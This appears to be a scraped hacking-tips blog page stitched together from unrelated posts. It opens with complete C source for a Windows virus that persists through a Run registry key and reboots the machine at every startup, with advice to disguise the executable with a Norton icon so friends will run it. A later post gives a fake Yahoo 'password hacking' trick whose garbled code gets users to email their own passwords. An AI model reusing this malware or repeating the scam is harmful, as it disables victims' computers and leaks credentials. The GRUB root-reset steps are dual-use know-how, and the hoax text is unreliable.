A C Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE
2. Goto

X:\Windows\System

(X can be C,D,E or F) 3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

Read More

Linux Base Command Linux INDEX

 Basic BASH commands....

A

alias Create an alias
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index

B
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)

C
cal Display a calendar
case Conditionally perform a command
cat Display the contents of a file
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command – ignoring shell functions
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts

D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls’
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage

E
echo Display message on screen
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions

F
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file

G
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groups Print group names a user is in
gzip Compress or decompress named file(s)

H
hash Remember the full pathname of a name argument
head Output the first part of file(s)
history Command History
hostname Print or set system name

I
id Print user and group id’s
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes

J
join Join lines on a common field

K
kill Stop a process from running
killall Kill processes by name

L
less Display output one screen at a time
let Perform arithmetic on shell variables
ln Make links between files
local Create variables
locate Find files
logname Print current login name
logout Exit a login shell
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files

M
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mv Move or rename files or directories
mmv Mass Move and rename (files)

N
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
nslookup Query Internet name servers interactively

O
open Open a file in its default application
op Operator access

P
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory

Q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas

R
ram ram disk device
rcp Copy files between two machines
read read a line from standard input
readonly Mark variables/functions as readonly
reboot Reboot the system
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)

S
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.’
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
symlink Make a new name for a file
sync Synchronize data on disk with memory

T
tail Output the last part of files
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command

U
ulimit Limit user resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
useradd Create new user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode

V
v Verbosely list directory contents (`ls -l -b’)
vdir Verbosely list directory contents (`ls -l -b’)
vi Text Editor
vmstat Report virtual memory statistics

W
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Report all known instances of a command
which Locate a program file in the user’s path.
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un’)
Wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user

X
xargs Execute utility, passing constructed argument list(s)
yes Print a string until interrupted
. Run a command script in the current shell

Read More

How to get your lost yahoo email password?

If you lose or forget your Yahoo email password, there are three basic methods for you to regain access to your Yahoo email account:

1. Reset your Yahoo email password online
2. Recover your Yahoo email password from your web browser
3. Recover your stored Yahoo email password from the Windows Registry

Reset your Yahoo Email Password

The easiest and reliable way to recover a Yahoo email password is to go to the Yahoo! Sign-in Problems page. After going to the above mentioned link, follow the below steps carefully,

1. Select I forgot my password and click Next

2. Enter your Yahoo mail address and type the alphanumeric characters from the image shown. The latter is used to verify that you’re a human and not some computer operated program. Click on Next

3. Enter your date of birth, country of residence and the postal code. This information should be same as that at the time of creating the mail address. Click Next.

If the prior information is correct, you’ll be asked to enter a new password for your Yahoo mail address. You will also need to retype the password for confirmation.

You can now login into your Yahoo mail account using the new password.

II. Recover your Yahoo Email Password from your Web Browser

Most Yahoo users allow their web browsers to store their Yahoo password. Every different web browser stores the Yahoo password in a different manner.

The method for recovering these stored passwords is different for each web browser.

Recover password from Web Browsers...

III. Getting your Yahoo Email Password from the Windows Registry

If you are running Yahoo Messenger in addition to Yahoo Email, you can use Mail PassView or Advanced Instant Messengers Password Recovery to retrieve your Yahoo password from the Windows registry.

If you are running Yahoo Pager, you can use Anti-Secure to retrieve your Yahoo password from the Windows registry

2. Another Way

It is possible and it is easy. This way of hacking into Yahoo email accounts was brought to my attention by a friend of mine who is a bit of a computer wizard. I have tried the method a least a dozen times and it has
worked on all but 2 occasions, I don't know the reason why it failed a couple of times, but on every other occasion it has got me the password for the requested email address. This is how it is done:

STEP 1- Log in to your own yahoo account. Note: Your account must be at least 30 days old for this to work.

STEP 2- Once you have logged into your own account, compose/write an e-mail to: 

RETRIVE_PASS_KEY_CGI_BIN@yahoo.com 

This is a mailing address to the Yahoo Staff. The automated server will send you the password that you have
'forgotten', after receiving the information you send them.
 

STEP 3- In the subject line type exactly: " PASSWORD RECOVERY "
 

STEP 4- On the first line of your mail write the email address of the person you are hacking.
 

STEP 5- On the second line type in the e-mail address you are using.
 

STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a JavaScript from your account in the Yahoo Server to extract the other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status. The process will be done automatically by the user administration server. 

STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: 

cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start? 

v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>

{simply copy and paste above.} 

so for example if your yahoo id is : PCTipsbyAnu_100@yahoo.com 

and your password is: PCTipsbyAnu

and the email address you want to hack is: test@yahoo.com 

then compose the mail as below:

To: RETRIVE_PASS_KEY_CGI_BIN@yahoo.com
bcc: cc: (Don't write anything in cc,bcc field)
Subject: " PASSWORD RECOVERY "

test@yahoo.com
PCTipsbyAnu_100@yahoo.com
PCTipsbyAnu
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>

{simply copy and paste above.}

The password will be sent to your inbox in a mail called "System Reg Message" from "System". When my friend showed me how to do this I thought it was too good a trick to keep to myself! Just try and enjoy!

Read More

How to hack Ubuntu ROOT password?

Here is a way to reset or hack superuser password, provided you have physical access to reboot the system and username. All you need to do is just reboot the system and then follow these instructions.

Before the Ubuntu splash screen, a GRUB menu appears with different mode of booting the Ubuntu Linux. 

We can follow two ways to reset the password starting from the grub menu.

Method - 1 (easy)

After rebooting our system, you will find Ubuntu, Linux (recover mode), as second option on GRUB menu.

 Boot the system in recovery mode. 

Once you boot the system Recovery Menu will appear, now select  "Drop to root shell prompt " ( with or without networking)" 

and press ->enter key, it will take you to shell prompt with root access.

In command line Type 

# passwd username  //command to reset your password.

Type your new password for the username and then press enter.

# Sync   //if necessary

# reboot -f  //command to reboot the system

Method - 2 (Advance)

After rebooting our system, hold on to first option i.e. default on the grub menu (Ubuntu, Linux 2.-- Generic) 

and then Press "e" to edit.

Look out for line that contains "ro quiet splash" and move the cursor using arrow keys and go to that line,  simply replace "ro quiet splash" with "rw init=/bin/bash" without double quotes and then use CTRL + X to boot the system. 

Now the system will boot to root shell.

In command line Type 

# passwd root  //command to reset your password.

Type your new password for the username and then press enter.

# Sync

# reboot -f  //command to reboot the system

Reboot the system normally and at the login screen enter the new password, it will allow you to login...

Read More

How to delete Autorun.inf virus?

Once it happened to a friend of mine, when his newly bought laptop was infected with this autorun.inf virus. This virus corrupted almost all the  drives on the Hard disk, and when ever he tried to double click on the drive or opening  any drive it opened in a new window. In some cases, when your drive is infected with this Autorun.inf virus, you won’t be able to access the drive completely. You have to browse the drive by Exploring it i.e; Ctrl+E keys from the keyboard.

Sometimes ever you will not be able to see hidden files even if you have Show hidden files Enabled under Folder Options. well, this are all the wonders of this Autorun.inf virus.

I am going to show you this rare method of removing Autorun.inf manually using just winrar application, not any antivirus or malware programs.

Solution to Remove Autorun.inf Virus

Step 1: First Disable CD/DVD or USB Autorun in windows

When ever you plug a usb device to the system or insert a cd/dvd disk, The windows Autorun Run utility runs and displays certain options like Open files to view, Play, Do nothing etc.

Although this a good utility provided by windows xp operating system, It is sometimes very dangerous too. When A virus infected Usb drive or Cd is plugged into the system, the virus gets a chance to attack you Operating system, by running automatically when you plug your device in.

Follow the below steps and ensure your systems safety.

1) Click Start –> Run and type  GPEDIT.MSC  –  This opens Group Policy editor window.

2) On the left side –> expand  Computer Configuration–> Administrative Templates–> System.

     for windows 7--> expand  Computer Configuration–> Administrative Templates–> Windows Components.

3)  Locate the entry for Turn autoplay off on the right side.

4) Double click it and select “Enabled”

 

Step 2: Open Winrar.exe  (Start–>All Programs–>WinRar–>WinRar.exe)

Step 3: Now Browse to any drive that is infected with Autorun.inf virus using winrar explorer.

Step4: Here you will see all the hidden files under winrar for that particular drive.

Step 5: Look for the file Autorun.inf and open it using notepad.

Step 6: In that Autorun file, some .EXE file will be mentioned that will be executed along with the autorun file. This exe file is the main culprit.

Step 7: Note the exe file mentioned in the Autorun.inf file. Close this Autorun.inf file.

Step 8: Now look for that .Exe file in the drive (Ex: c:/), Delete that .exe file along with Autorun.inf

Step 9: Restart your Operating System. Now your system is free with Autorun.inf Virus.

Note: Repeat the same process if your Usb or Pendrives are infected with Autorun.inf virus.

Read More

Trick To Lock Your Computer With Usb

Security of laptops and notebooks have been evolving with new technologies like fingerprint readers,eye scanners,face recognition etc but what about the personal computers?

Using this trick you will be able to lock your computer with a Usb.The computer will work only when the Usb is plugged in.Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark.Moreover your computer will get automatically locked.To unlock the computer you will need to insert the Usb again.

This trick will work on on all versions of windows including both windows 32 bit and 64 bit

Here is the Trick to lock Your Computer With Usb Using Predator

1. Download predator software by clicking here (2.3 mb)
2. Predator will get launched automatically after completing installation if not you can run it fromStart/Programs/Predator
3. Now Insert your Usb.You will get a message to define your new  password.(This process will not format your pendrive and your pendrive data will not be affected by this at all)
4. Click on Ok and Enter your your new password in next dialog box

1. 1. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list
   2. Finally click on Create Key button and then on OK button
2. After this the software will automatically exit.Now restart the program by clicking the icon on desktop.
   Predator will take few seconds for initialization.Once the icon in the taskbar turns green then your software has initialized itself.

Read More

Your Keyboard LED’s to Show Network Activity

Most of the modern keyboards have three inbuilt LED lights for Num Lock,Caps Lock and Scroll Lock.But they are idle for most of the time and we usually use only Caps Lock LED.Now we can use Num Lock LED and Scroll Lock LED to show networking activity.They will blink whenever you send or receive some data using internet.

If you want to blink your keyboard LED’s continuously then you should also read the trick to Convert keyboard LED into Disco lights

We will be using a very small freeware utility called Network Lights only 75 kb in size and it doesn’t require any installation.I have tested this utility in windows 7  and it works fine.

How To Show network Activity Using Keyboard LED’s?

• Download Network Lights
• Open the network-lights.zip file and click on Networklights.exe file
• It will automatically minimize into your taskbar and from now onwards your keyboard LED’s will show network activity.
• If you want to exit this utility simply right click on the taskbar icon and click on Exit

Read More